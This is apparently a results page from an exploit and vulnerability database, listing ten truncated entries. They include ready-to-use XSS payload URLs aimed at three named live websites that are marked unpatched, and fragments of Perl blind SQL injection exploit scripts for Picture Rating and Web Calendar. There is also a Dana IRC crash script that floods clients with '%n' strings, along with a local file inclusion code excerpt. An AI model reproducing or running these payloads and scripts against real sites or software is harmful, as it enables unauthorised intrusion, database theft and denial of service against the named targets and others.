10 matches found
sophieconran.com XSS vulnerability
Vulnerable URL: https://www.sophieconran.com/catalogsearch/result/?q=%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 27.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 1269039 VIP...
erateks.su XSS vulnerability
Vulnerable URL: http://erateks.su/ru/search?a=0=%22%3E%3Cscript%3Ealert%28%2fxssposed%2f%29%3b%3C%2fscript%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculate...
youroscommerce.com XSS vulnerability
Vulnerable URL: http://youroscommerce.com/advancedsearchresult.php?keywords=asd%22%3E%3Csvg%20onload=alert%28/XSSPOSED/%29%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 25.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 2190566...
Dana IRC <= 1.3 - Remote Buffer Overflow PoC
No description provided by source. - Dana IRC = 1.3 Remote Buffer Overflow POC/Crash - Discovered On: 14 JUNE 2008 Discovered By: t0pP8uZz Download: diebestenbits.de - Info - Dana Irc client suffers from a remote buffer overflow, sending a buffer of around 2k overwrites the EIP therefor crashes t...
Picture Rating 1.0 - Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has...
Crux Gallery 1.32 - 'theme' Local File Inclusion
+=========================================================+ +=========================================================+ ? Crux Gallery Osirys and darkjoker 14. $m = $GET'm'; 15. $p = $GET'p'; 16. $dir = $GET'dir'; 17. requireonce"main.php"; 18. requireonce"themes/".$theme."/theme.php"; $theme isn...
Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability
No description provided by source. --==+============================================================================+==-- --==+ Galatolo Web Manager 1.3a = XSS / Remote SQL Injection Vulnerability +==-- --==+============================================================================+==--...
WebBlizzard CMS 'index.php' SQL注入漏洞
BUGTRAQ ID: 30074 CNCAN ID:CNCAN-2008070701 WebBlizzard CMS是一款基于PHP的WEB应用程序。 WebBlizzard CMS不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,可能获得敏感信息或操作数据库。 问题由于'index.php'脚本对用户提交给WEB参数缺少过滤,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,获得敏感信息或操作数据库。 WebBlizzard CMS 目前没有解决方案提供: http://www.webblizzard.de/ /usr/bin/perl |+| Vendor...
danairc-dos.txt
Dana IRC new Proto = 'tcp', LocalPort = '6667', Listen = SOMAXCONN, Reuse = 1 ; $jnk = "%n"x1000; print "Running.."; while$client = $sock-accept print $client "$jnk\r\n"; print "Crashed Client!\n";...
Web Calendar 4.1 - Blind SQL Injection
Web Calendar 4.1 - Blind SQL Injection !/usr/bin/perl use strict; use LWP::Simple; print "-+-- Web Calendar ; print "\n\nInjecting Please Wait..\n\n" my $lop = 1; my $num = 48; my $sub = 1; my $res = undef; my $content = undef; while$lop $content = get$url."/oneday.php?userid=1 AND...